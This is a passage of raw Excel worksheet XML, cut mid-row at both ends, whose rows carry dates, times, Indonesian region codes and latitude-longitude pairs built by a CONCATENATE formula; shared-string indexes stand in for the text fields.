      </c>
      <c r="P2306">
        <v>61</v>
      </c>
      <c r="Q2306" t="s">
        <v>7559</v>
      </c>
      <c r="R2306" t="s">
        <v>7560</v>
      </c>
      <c r="S2306" t="s">
        <v>7561</v>
      </c>
      <c r="T2306" t="s">
        <v>7441</v>
      </c>
      <c r="U2306" s="5">
        <v>11173626</v>
      </c>
      <c r="V2306" s="5" t="s">
        <v>16505</v>
      </c>
      <c r="W2306" s="5">
        <v>-32938</v>
      </c>
      <c r="X2306" t="s">
        <v>20252</v>
      </c>
      <c r="Y2306" t="str">
        <f t="shared" si="35"/>
        <v>-.32938,111.73626</v>
      </c>
    </row>
    <row r="2307" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2307">
        <v>199680</v>
      </c>
      <c r="B2307" s="1">
        <v>44088</v>
      </c>
      <c r="C2307" s="2">
        <v>0.28958333333333336</v>
      </c>
      <c r="D2307" t="s">
        <v>2648</v>
      </c>
      <c r="E2307" t="s">
        <v>23</v>
      </c>
      <c r="G2307" t="s">
        <v>7780</v>
      </c>
      <c r="H2307" t="s">
        <v>26</v>
      </c>
      <c r="J2307" t="s">
        <v>7781</v>
      </c>
      <c r="L2307" t="s">
        <v>7782</v>
      </c>
      <c r="M2307">
        <v>3171020003</v>
      </c>
      <c r="N2307">
        <v>3171020</v>
      </c>
      <c r="O2307">
        <v>3171</v>
      </c>
      <c r="P2307">
        <v>31</v>
      </c>
      <c r="Q2307" t="s">
        <v>7783</v>
      </c>
      <c r="R2307" t="s">
        <v>484</v>
      </c>
      <c r="S2307" t="s">
        <v>108</v>
      </c>
      <c r="T2307" t="s">
        <v>33</v>
      </c>
      <c r="U2307" s="5">
        <v>10683447</v>
      </c>
      <c r="V2307" s="5" t="s">
        <v>16506</v>
      </c>
      <c r="W2307" s="5">
        <v>-630510</v>
      </c>
      <c r="X2307" t="s">
        <v>20253</v>
      </c>
      <c r="Y2307" t="str">
        <f t="shared" ref="Y2307:Y2370" si="36">CONCATENATE(X2307,",",V2307)</f>
        <v>-6.30510,106.83447</v>
      </c>
    </row>
    <row r="2308" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2308">
        <v>199682</v>
      </c>
      <c r="B2308" s="1">
        <v>44088</v>
      </c>
      <c r="C2308" s="2">
        <v>0.38694444444444448</v>
      </c>
      <c r="D2308" t="s">
        <v>22</v>
      </c>
      <c r="E2308" t="s">
        <v>23</v>
      </c>
      <c r="F2308" t="s">
        <v>7784</v>
      </c>
      <c r="G2308" t="s">
        <v>7785</v>
      </c>
      <c r="H2308" t="s">
        <v>26</v>
      </c>
      <c r="I2308" t="s">
        <v>137</v>
      </c>
      <c r="J2308" t="s">
        <v>7436</v>
      </c>
      <c r="L2308" t="s">
        <v>7786</v>
      </c>
      <c r="M2308">
        <v>6171010005</v>
      </c>
      <c r="N2308">
        <v>6171010</v>
      </c>
      <c r="O2308">
        <v>6171</v>
      </c>
      <c r="P2308">
        <v>61</v>
      </c>
      <c r="Q2308" t="s">
        <v>7787</v>
      </c>
      <c r="R2308" t="s">
        <v>7788</v>
      </c>
      <c r="S2308" t="s">
        <v>7789</v>
      </c>
      <c r="T2308" t="s">
        <v>7441</v>
      </c>
      <c r="U2308" s="5">
        <v>10932723</v>
      </c>
      <c r="V2308" s="5" t="s">
        <v>16507</v>
      </c>
      <c r="W2308" s="5">
        <v>-4111</v>
      </c>
      <c r="X2308" t="s">
        <v>20254</v>
      </c>
      <c r="Y2308" t="str">
        <f t="shared" si="36"/>
        <v xml:space="preserve"> -0.04111,109.32723</v>
      </c>
    </row>
    <row r="2309" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2309">
        <v>199683</v>
      </c>
      <c r="B2309" s="1">
        <v>44088</v>
      </c>
      <c r="C2309" s="2">
        <v>0.39064814814814813</v>
      </c>
      <c r="D2309" t="s">
        <v>22</v>
      </c>
      <c r="E2309" t="s">
        <v>23</v>
      </c>
      <c r="F2309" t="s">
        <v>7790</v>
      </c>
      <c r="G2309" t="s">
        <v>7791</v>
      </c>
      <c r="H2309" t="s">
        <v>26</v>
      </c>
      <c r="I2309" t="s">
        <v>3481</v>
      </c>
      <c r="J2309" t="s">
        <v>7436</v>
      </c>
      <c r="L2309" t="s">
        <v>7792</v>
      </c>
      <c r="M2309">
        <v>6171010005</v>
      </c>
      <c r="N2309">
        <v>6171010</v>
      </c>
      <c r="O2309">
        <v>6171</v>
      </c>
      <c r="P2309">
        <v>61</v>
      </c>
      <c r="Q2309" t="s">
        <v>7787</v>
      </c>
      <c r="R2309" t="s">
        <v>7788</v>
      </c>
      <c r="S2309" t="s">
        <v>7789</v>
      </c>
      <c r="T2309" t="s">
        <v>7441</v>
      </c>
      <c r="U2309" s="5">
        <v>10932721</v>
      </c>
      <c r="V2309" s="5" t="s">
        <v>16508</v>
      </c>
      <c r="W2309" s="5">
        <v>-4110</v>
      </c>
      <c r="X2309" t="s">
        <v>20255</v>
      </c>
      <c r="Y2309" t="str">
        <f t="shared" si="36"/>
        <v xml:space="preserve"> -0.04110,109.32721</v>
      </c>
    </row>
    <row r="2310" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2310">
        <v>199684</v>
      </c>
      <c r="B2310" s="1">
        <v>44088</v>
      </c>
      <c r="C2310" s="2">
        <v>0.57013888888888886</v>
      </c>
      <c r="D2310" t="s">
        <v>2648</v>
      </c>
      <c r="E2310" t="s">
        <v>23</v>
      </c>
      <c r="G2310" t="s">
        <v>7793</v>
      </c>
      <c r="H2310" t="s">
        <v>26</v>
      </c>
      <c r="J2310" t="s">
        <v>7794</v>
      </c>
      <c r="L2310" t="s">
        <v>7795</v>
      </c>
      <c r="M2310">
        <v>3172020001</v>
      </c>
      <c r="N2310">
        <v>3172020</v>
      </c>
      <c r="O2310">
        <v>3172</v>
      </c>
      <c r="P2310">
        <v>31</v>
      </c>
      <c r="Q2310" t="s">
        <v>7796</v>
      </c>
      <c r="R2310" t="s">
        <v>1644</v>
      </c>
      <c r="S2310" t="s">
        <v>49</v>
      </c>
      <c r="T2310" t="s">
        <v>33</v>
      </c>
      <c r="U2310" s="5">
        <v>10687437</v>
      </c>
      <c r="V2310" s="5" t="s">
        <v>16509</v>
      </c>
      <c r="W2310" s="5">
        <v>-636036</v>
      </c>
      <c r="X2310" t="s">
        <v>20256</v>
      </c>
      <c r="Y2310" t="str">
        <f t="shared" si="36"/>
        <v>-6.36036,106.87437</v>
      </c>
    </row>
    <row r="2311" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2311">
        <v>199688</v>
      </c>
      <c r="B2311" s="1">
        <v>44088</v>
      </c>
      <c r="C2311" s="2">
        <v>0.60486111111111118</v>
      </c>
      <c r="D2311" t="s">
        <v>2648</v>
      </c>
      <c r="E2311" t="s">
        <v>23</v>
      </c>
      <c r="G2311" t="s">
        <v>7797</v>
      </c>
      <c r="H2311" t="s">
        <v>26</v>
      </c>
      <c r="J2311" t="s">
        <v>7798</v>
      </c>
      <c r="L2311" t="s">
        <v>7799</v>
      </c>
      <c r="M2311">
        <v>3174060001</v>
      </c>
      <c r="N2311">
        <v>3174060</v>
      </c>
      <c r="O2311">
        <v>3174</v>
      </c>
      <c r="P2311">
        <v>31</v>
      </c>
      <c r="Q2311" t="s">
        <v>4694</v>
      </c>
      <c r="R2311" t="s">
        <v>1762</v>
      </c>
      <c r="S2311" t="s">
        <v>32</v>
      </c>
      <c r="T2311" t="s">
        <v>33</v>
      </c>
      <c r="U2311" s="5">
        <v>10681286</v>
      </c>
      <c r="V2311" s="5" t="s">
        <v>16510</v>
      </c>
      <c r="W2311" s="5">
        <v>-615641</v>
      </c>
      <c r="X2311" t="s">
        <v>18776</v>
      </c>
      <c r="Y2311" t="str">
        <f t="shared" si="36"/>
        <v>-6.15641,106.81286</v>
      </c>
    </row>
    <row r="2312" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2312">
        <v>199692</v>
      </c>
      <c r="B2312" s="1">
        <v>44088</v>
      </c>
      <c r="C2312" s="2">
        <v>0.61597222222222225</v>
      </c>
      <c r="D2312" t="s">
        <v>2648</v>
      </c>
      <c r="E2312" t="s">
        <v>23</v>
      </c>
      <c r="G2312" t="s">
        <v>7800</v>
      </c>
      <c r="H2312" t="s">
        <v>26</v>
      </c>
      <c r="J2312" t="s">
        <v>374</v>
      </c>
      <c r="L2312" t="s">
        <v>7801</v>
      </c>
      <c r="M2312">
        <v>3174040005</v>
      </c>
      <c r="N2312">
        <v>3174040</v>
      </c>
      <c r="O2312">
        <v>3174</v>
      </c>
      <c r="P2312">
        <v>31</v>
      </c>
      <c r="Q2312" t="s">
        <v>376</v>
      </c>
      <c r="R2312" t="s">
        <v>377</v>
      </c>
      <c r="S2312" t="s">
        <v>32</v>
      </c>
      <c r="T2312" t="s">
        <v>33</v>
      </c>
      <c r="U2312" s="5">
        <v>10678816</v>
      </c>
      <c r="V2312" s="5" t="s">
        <v>16511</v>
      </c>
      <c r="W2312" s="5">
        <v>-616399</v>
      </c>
      <c r="X2312" t="s">
        <v>18884</v>
      </c>
      <c r="Y2312" t="str">
        <f t="shared" si="36"/>
        <v>-6.16399,106.78816</v>
      </c>
    </row>
    <row r="2313" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2313">
        <v>199703</v>
      </c>
      <c r="B2313" s="1">
        <v>44088</v>
      </c>
      <c r="C2313" s="2">
        <v>0.63949074074074075</v>
      </c>
      <c r="D2313" t="s">
        <v>22</v>
      </c>
      <c r="E2313" t="s">
        <v>23</v>
      </c>
      <c r="F2313" t="s">
        <v>7802</v>
      </c>
      <c r="G2313" t="s">
        <v>7803</v>
      </c>
      <c r="H2313" t="s">
        <v>26</v>
      </c>
      <c r="I2313" t="s">
        <v>137</v>
      </c>
      <c r="J2313" t="s">
        <v>550</v>
      </c>
      <c r="L2313" t="s">
        <v>7804</v>
      </c>
      <c r="M2313">
        <v>3172040003</v>
      </c>
      <c r="N2313">
        <v>3172040</v>
      </c>
      <c r="O2313">
        <v>3172</v>
      </c>
      <c r="P2313">
        <v>31</v>
      </c>
      <c r="Q2313" t="s">
        <v>552</v>
      </c>
      <c r="R2313" t="s">
        <v>281</v>
      </c>
      <c r="S2313" t="s">
        <v>49</v>
      </c>
      <c r="T2313" t="s">
        <v>33</v>
      </c>
      <c r="U2313" s="5">
        <v>10687770</v>
      </c>
      <c r="V2313" s="5" t="s">
        <v>15297</v>
      </c>
      <c r="W2313" s="5">
        <v>-625065</v>
      </c>
      <c r="X2313" t="s">
        <v>20257</v>
      </c>
      <c r="Y2313" t="str">
        <f t="shared" si="36"/>
        <v>-6.25065,106.87770</v>
      </c>
    </row>
    <row r="2314" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2314">
        <v>199951</v>
      </c>
      <c r="B2314" s="1">
        <v>44088</v>
      </c>
      <c r="C2314" s="2">
        <v>0.61527777777777781</v>
      </c>
      <c r="D2314" t="s">
        <v>2648</v>
      </c>
      <c r="E2314" t="s">
        <v>23</v>
      </c>
      <c r="G2314" t="s">
        <v>7805</v>
      </c>
      <c r="H2314" t="s">
        <v>26</v>
      </c>
      <c r="J2314" t="s">
        <v>28</v>
      </c>
      <c r="L2314" t="s">
        <v>7806</v>
      </c>
      <c r="M2314">
        <v>3174020005</v>
      </c>
      <c r="N2314">
        <v>3174020</v>
      </c>
      <c r="O2314">
        <v>3174</v>
      </c>
      <c r="P2314">
        <v>31</v>
      </c>
      <c r="Q2314" t="s">
        <v>30</v>
      </c>
      <c r="R2314" t="s">
        <v>31</v>
      </c>
      <c r="S2314" t="s">
        <v>32</v>
      </c>
      <c r="T2314" t="s">
        <v>33</v>
      </c>
      <c r="U2314" s="5">
        <v>10677040</v>
      </c>
      <c r="V2314" s="5" t="s">
        <v>16512</v>
      </c>
      <c r="W2314" s="5">
        <v>-616840</v>
      </c>
      <c r="X2314" t="s">
        <v>18488</v>
      </c>
      <c r="Y2314" t="str">
        <f t="shared" si="36"/>
        <v>-6.16840,106.77040</v>
      </c>
    </row>
    <row r="2315" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2315">
        <v>199998</v>
      </c>
      <c r="B2315" s="1">
        <v>44089</v>
      </c>
      <c r="C2315" s="2">
        <v>0.11935185185185186</v>
      </c>
      <c r="D2315" t="s">
        <v>22</v>
      </c>
      <c r="E2315" t="s">
        <v>23</v>
      </c>
      <c r="F2315" t="s">
        <v>7807</v>
      </c>
      <c r="G2315" t="s">
        <v>7808</v>
      </c>
      <c r="H2315" t="s">
        <v>26</v>
      </c>
      <c r="I2315" t="s">
        <v>430</v>
      </c>
      <c r="J2315" t="s">
        <v>7436</v>
      </c>
      <c r="L2315" t="s">
        <v>7809</v>
      </c>
      <c r="M2315">
        <v>6108080004</v>
      </c>
      <c r="N2315">
        <v>6108080</v>
      </c>
      <c r="O2315">
        <v>6108</v>
      </c>
      <c r="P2315">
        <v>61</v>
      </c>
      <c r="Q2315" t="s">
        <v>7810</v>
      </c>
      <c r="R2315" t="s">
        <v>7811</v>
      </c>
      <c r="S2315" t="s">
        <v>7812</v>
      </c>
      <c r="T2315" t="s">
        <v>7441</v>
      </c>
      <c r="U2315" s="5">
        <v>11293701</v>
      </c>
      <c r="V2315" s="5" t="s">
        <v>16513</v>
      </c>
      <c r="W2315" s="5">
        <v>83425</v>
      </c>
      <c r="X2315" t="s">
        <v>14445</v>
      </c>
      <c r="Y2315" t="str">
        <f t="shared" si="36"/>
        <v>0.83425,112.93701</v>
      </c>
    </row>
    <row r="2316" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2316">
        <v>200261</v>
      </c>
      <c r="B2316" s="1">
        <v>44089</v>
      </c>
      <c r="C2316" s="2">
        <v>0.42569444444444443</v>
      </c>
      <c r="D2316" t="s">
        <v>2648</v>
      </c>
      <c r="E2316" t="s">
        <v>23</v>
      </c>
      <c r="G2316" t="s">
        <v>7813</v>
      </c>
      <c r="H2316" t="s">
        <v>26</v>
      </c>
      <c r="J2316" t="s">
        <v>3135</v>
      </c>
      <c r="L2316" t="s">
        <v>7814</v>
      </c>
      <c r="M2316">
        <v>3674050002</v>
      </c>
      <c r="N2316">
        <v>3674050</v>
      </c>
      <c r="O2316">
        <v>3674</v>
      </c>
      <c r="P2316">
        <v>36</v>
      </c>
      <c r="Q2316" t="s">
        <v>7815</v>
      </c>
      <c r="R2316" t="s">
        <v>1043</v>
      </c>
      <c r="S2316" t="s">
        <v>170</v>
      </c>
      <c r="T2316" t="s">
        <v>171</v>
      </c>
      <c r="U2316" s="5">
        <v>10677136</v>
      </c>
      <c r="V2316" s="5" t="s">
        <v>16514</v>
      </c>
      <c r="W2316" s="5">
        <v>-631084</v>
      </c>
      <c r="X2316" t="s">
        <v>20258</v>
      </c>
      <c r="Y2316" t="str">
        <f t="shared" si="36"/>
        <v>-6.31084,106.77136</v>
      </c>
    </row>
    <row r="2317" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2317">
        <v>200855</v>
      </c>
      <c r="B2317" s="1">
        <v>44090</v>
      </c>
      <c r="C2317" s="2">
        <v>0.19999999999999998</v>
      </c>
      <c r="D2317" t="s">
        <v>2648</v>
      </c>
      <c r="E2317" t="s">
        <v>23</v>
      </c>
      <c r="G2317" t="s">
        <v>7816</v>
      </c>
      <c r="H2317" t="s">
        <v>26</v>
      </c>
      <c r="J2317" t="s">
        <v>2806</v>
      </c>
      <c r="L2317" t="s">
        <v>7817</v>
      </c>
      <c r="M2317">
        <v>3171010004</v>
      </c>
      <c r="N2317">
        <v>3171010</v>
      </c>
      <c r="O2317">
        <v>3171</v>
      </c>
      <c r="P2317">
        <v>31</v>
      </c>
      <c r="Q2317" t="s">
        <v>264</v>
      </c>
      <c r="R2317" t="s">
        <v>264</v>
      </c>
      <c r="S2317" t="s">
        <v>108</v>
      </c>
      <c r="T2317" t="s">
        <v>33</v>
      </c>
      <c r="U2317" s="5">
        <v>10681398</v>
      </c>
      <c r="V2317" s="5" t="s">
        <v>16515</v>
      </c>
      <c r="W2317" s="5">
        <v>-633026</v>
      </c>
      <c r="X2317" t="s">
        <v>20259</v>
      </c>
      <c r="Y2317" t="str">
        <f t="shared" si="36"/>
        <v>-6.33026,106.81398</v>
      </c>
    </row>
    <row r="2318" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2318">
        <v>201027</v>
      </c>
      <c r="B2318" s="1">
        <v>44091</v>
      </c>
      <c r="C2318" s="2">
        <v>0.42569444444444443</v>
      </c>
      <c r="D2318" t="s">
        <v>2648</v>
      </c>
      <c r="E2318" t="s">
        <v>23</v>
      </c>
      <c r="G2318" t="s">
        <v>7818</v>
      </c>
      <c r="H2318" t="s">
        <v>26</v>
      </c>
      <c r="J2318" t="s">
        <v>7819</v>
      </c>
      <c r="L2318" t="s">
        <v>7820</v>
      </c>
      <c r="M2318">
        <v>3172040004</v>
      </c>
      <c r="N2318">
        <v>3172040</v>
      </c>
      <c r="O2318">
        <v>3172</v>
      </c>
      <c r="P2318">
        <v>31</v>
      </c>
      <c r="Q2318" t="s">
        <v>280</v>
      </c>
      <c r="R2318" t="s">
        <v>281</v>
      </c>
      <c r="S2318" t="s">
        <v>49</v>
      </c>
      <c r="T2318" t="s">
        <v>33</v>
      </c>
      <c r="U2318" s="5">
        <v>10687725</v>
      </c>
      <c r="V2318" s="5" t="s">
        <v>16516</v>
      </c>
      <c r="W2318" s="5">
        <v>-627296</v>
      </c>
      <c r="X2318" t="s">
        <v>20260</v>
      </c>
      <c r="Y2318" t="str">
        <f t="shared" si="36"/>
        <v>-6.27296,106.87725</v>
      </c>
    </row>
    <row r="2319" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2319">
        <v>201028</v>
      </c>
      <c r="B2319" s="1">
        <v>44091</v>
      </c>
      <c r="C2319" s="2">
        <v>0.42499999999999999</v>
      </c>
      <c r="D2319" t="s">
        <v>2648</v>
      </c>
      <c r="E2319" t="s">
        <v>23</v>
      </c>
      <c r="G2319" t="s">
        <v>7821</v>
      </c>
      <c r="H2319" t="s">
        <v>26</v>
      </c>
      <c r="J2319" t="s">
        <v>7822</v>
      </c>
      <c r="L2319" t="s">
        <v>7823</v>
      </c>
      <c r="M2319">
        <v>3172040002</v>
      </c>
      <c r="N2319">
        <v>3172040</v>
      </c>
      <c r="O2319">
        <v>3172</v>
      </c>
      <c r="P2319">
        <v>31</v>
      </c>
      <c r="Q2319" t="s">
        <v>281</v>
      </c>
      <c r="R2319" t="s">
        <v>281</v>
      </c>
      <c r="S2319" t="s">
        <v>49</v>
      </c>
      <c r="T2319" t="s">
        <v>33</v>
      </c>
      <c r="U2319" s="5">
        <v>10687492</v>
      </c>
      <c r="V2319" s="5" t="s">
        <v>16517</v>
      </c>
      <c r="W2319" s="5">
        <v>-627299</v>
      </c>
      <c r="X2319" t="s">
        <v>20261</v>
      </c>
      <c r="Y2319" t="str">
        <f t="shared" si="36"/>
        <v>-6.27299,106.87492</v>
      </c>
    </row>
    <row r="2320" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2320">
        <v>201146</v>
      </c>
      <c r="B2320" s="1">
        <v>44095</v>
      </c>
      <c r="C2320" s="2">
        <v>0.49278935185185185</v>
      </c>
      <c r="D2320" t="s">
        <v>22</v>
      </c>
      <c r="E2320" t="s">
        <v>23</v>
      </c>
      <c r="F2320" t="s">
        <v>7824</v>
      </c>
      <c r="G2320" t="s">
        <v>7825</v>
      </c>
      <c r="H2320" t="s">
        <v>26</v>
      </c>
      <c r="I2320" t="s">
        <v>5612</v>
      </c>
      <c r="J2320" t="s">
        <v>6509</v>
      </c>
      <c r="L2320" t="s">
        <v>7826</v>
      </c>
      <c r="M2320">
        <v>6301060016</v>
      </c>
      <c r="N2320">
        <v>6301060</v>
      </c>
      <c r="O2320">
        <v>6301</v>
      </c>
      <c r="P2320">
        <v>63</v>
      </c>
      <c r="Q2320" t="s">
        <v>7536</v>
      </c>
      <c r="R2320" t="s">
        <v>7536</v>
      </c>
      <c r="S2320" t="s">
        <v>7537</v>
      </c>
      <c r="T2320" t="s">
        <v>6513</v>
      </c>
      <c r="U2320" s="5">
        <v>11477760</v>
      </c>
      <c r="V2320" s="5" t="s">
        <v>16518</v>
      </c>
      <c r="W2320" s="5">
        <v>-380904</v>
      </c>
      <c r="X2320" t="s">
        <v>20262</v>
      </c>
      <c r="Y2320" t="str">
        <f t="shared" si="36"/>
        <v>-3.80904,114.77760</v>
      </c>
    </row>
    <row r="2321" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2321">
        <v>201148</v>
      </c>
      <c r="B2321" s="1">
        <v>44095</v>
      </c>
      <c r="C2321" s="2">
        <v>0.53064814814814809</v>
      </c>
      <c r="D2321" t="s">
        <v>22</v>
      </c>
      <c r="E2321" t="s">
        <v>23</v>
      </c>
      <c r="F2321" t="s">
        <v>7827</v>
      </c>
      <c r="G2321" t="s">
        <v>7828</v>
      </c>
      <c r="H2321" t="s">
        <v>26</v>
      </c>
      <c r="I2321" t="s">
        <v>284</v>
      </c>
      <c r="J2321" t="s">
        <v>2627</v>
      </c>
      <c r="L2321" t="s">
        <v>7829</v>
      </c>
      <c r="M2321">
        <v>3202230009</v>
      </c>
      <c r="N2321">
        <v>3202230</v>
      </c>
      <c r="O2321">
        <v>3202</v>
      </c>
      <c r="P2321">
        <v>32</v>
      </c>
      <c r="Q2321" t="s">
        <v>7830</v>
      </c>
      <c r="R2321" t="s">
        <v>7830</v>
      </c>
      <c r="S2321" t="s">
        <v>7762</v>
      </c>
      <c r="T2321" t="s">
        <v>42</v>
      </c>
      <c r="U2321" s="5">
        <v>10677796</v>
      </c>
      <c r="V2321" s="5" t="s">
        <v>16519</v>
      </c>
      <c r="W2321" s="5">
        <v>-679318</v>
      </c>
      <c r="X2321" t="s">
        <v>20263</v>
      </c>
      <c r="Y2321" t="str">
        <f t="shared" si="36"/>
        <v>-6.79318,106.77796</v>
      </c>
    </row>
    <row r="2322" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2322">
        <v>201149</v>
      </c>
      <c r="B2322" s="1">
        <v>44095</v>
      </c>
      <c r="C2322" s="2">
        <v>0.55459490740740736</v>
      </c>
      <c r="D2322" t="s">
        <v>22</v>
      </c>
      <c r="E2322" t="s">
        <v>23</v>
      </c>
      <c r="F2322" t="s">
        <v>7831</v>
      </c>
      <c r="G2322" t="s">
        <v>7832</v>
      </c>
      <c r="H2322" t="s">
        <v>26</v>
      </c>
      <c r="I2322" t="s">
        <v>80</v>
      </c>
      <c r="J2322" t="s">
        <v>2627</v>
      </c>
      <c r="L2322" t="s">
        <v>7833</v>
      </c>
      <c r="M2322">
        <v>3271060009</v>
      </c>
      <c r="N2322">
        <v>3271060</v>
      </c>
      <c r="O2322">
        <v>3271</v>
      </c>
      <c r="P2322">
        <v>32</v>
      </c>
      <c r="Q2322" t="s">
        <v>7834</v>
      </c>
      <c r="R2322" t="s">
        <v>7835</v>
      </c>
      <c r="S2322" t="s">
        <v>421</v>
      </c>
      <c r="T2322" t="s">
        <v>42</v>
      </c>
      <c r="U2322" s="5">
        <v>10676980</v>
      </c>
      <c r="V2322" s="5" t="s">
        <v>16520</v>
      </c>
      <c r="W2322" s="5">
        <v>-653736</v>
      </c>
      <c r="X2322" t="s">
        <v>20264</v>
      </c>
      <c r="Y2322" t="str">
        <f t="shared" si="36"/>
        <v>-6.53736,106.76980</v>
      </c>
    </row>
    <row r="2323" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2323">
        <v>201150</v>
      </c>
      <c r="B2323" s="1">
        <v>44095</v>
      </c>
      <c r="C2323" s="2">
        <v>0.56180555555555556</v>
      </c>
      <c r="D2323" t="s">
        <v>2648</v>
      </c>
      <c r="E2323" t="s">
        <v>23</v>
      </c>
      <c r="G2323" t="s">
        <v>7836</v>
      </c>
      <c r="H2323" t="s">
        <v>26</v>
      </c>
      <c r="J2323" t="s">
        <v>7837</v>
      </c>
      <c r="L2323" t="s">
        <v>7838</v>
      </c>
      <c r="M2323">
        <v>3174030003</v>
      </c>
      <c r="N2323">
        <v>3174030</v>
      </c>
      <c r="O2323">
        <v>3174</v>
      </c>
      <c r="P2323">
        <v>31</v>
      </c>
      <c r="Q2323" t="s">
        <v>1486</v>
      </c>
      <c r="R2323" t="s">
        <v>1487</v>
      </c>
      <c r="S2323" t="s">
        <v>32</v>
      </c>
      <c r="T2323" t="s">
        <v>33</v>
      </c>
      <c r="U2323" s="5">
        <v>10678676</v>
      </c>
      <c r="V2323" s="5" t="s">
        <v>16521</v>
      </c>
      <c r="W2323" s="5">
        <v>-619202</v>
      </c>
      <c r="X2323" t="s">
        <v>20265</v>
      </c>
      <c r="Y2323" t="str">
        <f t="shared" si="36"/>
        <v>-6.19202,106.78676</v>
      </c>
    </row>
    <row r="2324" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2324">
        <v>201152</v>
      </c>
      <c r="B2324" s="1">
        <v>44095</v>
      </c>
      <c r="C2324" s="2">
        <v>0.56388888888888888</v>
      </c>
      <c r="D2324" t="s">
        <v>2648</v>
      </c>
      <c r="E2324" t="s">
        <v>23</v>
      </c>
      <c r="G2324" t="s">
        <v>7839</v>
      </c>
      <c r="H2324" t="s">
        <v>26</v>
      </c>
      <c r="J2324" t="s">
        <v>5197</v>
      </c>
      <c r="L2324" t="s">
        <v>7840</v>
      </c>
      <c r="M2324">
        <v>3174040002</v>
      </c>
      <c r="N2324">
        <v>3174040</v>
      </c>
      <c r="O2324">
        <v>3174</v>
      </c>
      <c r="P2324">
        <v>31</v>
      </c>
      <c r="Q2324" t="s">
        <v>2605</v>
      </c>
      <c r="R2324" t="s">
        <v>377</v>
      </c>
      <c r="S2324" t="s">
        <v>32</v>
      </c>
      <c r="T2324" t="s">
        <v>33</v>
      </c>
      <c r="U2324" s="5">
        <v>10678768</v>
      </c>
      <c r="V2324" s="5" t="s">
        <v>16522</v>
      </c>
      <c r="W2324" s="5">
        <v>-618239</v>
      </c>
      <c r="X2324" t="s">
        <v>20266</v>
      </c>
      <c r="Y2324" t="str">
        <f t="shared" si="36"/>
        <v>-6.18239,106.78768</v>
      </c>
    </row>
    <row r="2325" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2325">
        <v>201156</v>
      </c>
      <c r="B2325" s="1">
        <v>44095</v>
      </c>
      <c r="C2325" s="2">
        <v>0.57291666666666663</v>
      </c>
      <c r="D2325" t="s">
        <v>2648</v>
      </c>
      <c r="E2325" t="s">
        <v>23</v>
      </c>
      <c r="G2325" t="s">
        <v>7841</v>
      </c>
      <c r="H2325" t="s">
        <v>26</v>
      </c>
      <c r="J2325" t="s">
        <v>728</v>
      </c>
      <c r="L2325" t="s">
        <v>7842</v>
      </c>
      <c r="M2325">
        <v>3174040001</v>
      </c>
      <c r="N2325">
        <v>3174040</v>
      </c>
      <c r="O2325">
        <v>3174</v>
      </c>
      <c r="P2325">
        <v>31</v>
      </c>
      <c r="Q2325" t="s">
        <v>730</v>
      </c>
      <c r="R2325" t="s">
        <v>377</v>
      </c>
      <c r="S2325" t="s">
        <v>32</v>
      </c>
      <c r="T2325" t="s">
        <v>33</v>
      </c>
      <c r="U2325" s="5">
        <v>10678213</v>
      </c>
      <c r="V2325" s="5" t="s">
        <v>16523</v>
      </c>
      <c r="W2325" s="5">
        <v>-617371</v>
      </c>
      <c r="X2325" t="s">
        <v>20267</v>
      </c>
      <c r="Y2325" t="str">
        <f t="shared" si="36"/>
        <v>-6.17371,106.78213</v>
      </c>
    </row>
    <row r="2326" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2326">
        <v>201161</v>
      </c>
      <c r="B2326" s="1">
        <v>44095</v>
      </c>
      <c r="C2326" s="2">
        <v>0.57500000000000007</v>
      </c>
      <c r="D2326" t="s">
        <v>2648</v>
      </c>
      <c r="E2326" t="s">
        <v>23</v>
      </c>
      <c r="G2326" t="s">
        <v>7843</v>
      </c>
      <c r="H2326" t="s">
        <v>26</v>
      </c>
      <c r="J2326" t="s">
        <v>374</v>
      </c>
      <c r="L2326" t="s">
        <v>7844</v>
      </c>
      <c r="M2326">
        <v>3174040005</v>
      </c>
      <c r="N2326">
        <v>3174040</v>
      </c>
      <c r="O2326">
        <v>3174</v>
      </c>
      <c r="P2326">
        <v>31</v>
      </c>
      <c r="Q2326" t="s">
        <v>376</v>
      </c>
      <c r="R2326" t="s">
        <v>377</v>
      </c>
      <c r="S2326" t="s">
        <v>32</v>
      </c>
      <c r="T2326" t="s">
        <v>33</v>
      </c>
      <c r="U2326" s="5">
        <v>10678815</v>
      </c>
      <c r="V2326" s="5" t="s">
        <v>16524</v>
      </c>
      <c r="W2326" s="5">
        <v>-616395</v>
      </c>
      <c r="X2326" t="s">
        <v>20268</v>
      </c>
      <c r="Y2326" t="str">
        <f t="shared" si="36"/>
        <v>-6.16395,106.78815</v>
      </c>
    </row>
    <row r="2327" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2327">
        <v>201163</v>
      </c>
      <c r="B2327" s="1">
        <v>44095</v>
      </c>
      <c r="C2327" s="2">
        <v>0.57986111111111105</v>
      </c>
      <c r="D2327" t="s">
        <v>2648</v>
      </c>
      <c r="E2327" t="s">
        <v>23</v>
      </c>
      <c r="G2327" t="s">
        <v>7845</v>
      </c>
      <c r="H2327" t="s">
        <v>26</v>
      </c>
      <c r="J2327" t="s">
        <v>7846</v>
      </c>
      <c r="L2327" t="s">
        <v>7847</v>
      </c>
      <c r="M2327">
        <v>3174040001</v>
      </c>
      <c r="N2327">
        <v>3174040</v>
      </c>
      <c r="O2327">
        <v>3174</v>
      </c>
      <c r="P2327">
        <v>31</v>
      </c>
      <c r="Q2327" t="s">
        <v>730</v>
      </c>
      <c r="R2327" t="s">
        <v>377</v>
      </c>
      <c r="S2327" t="s">
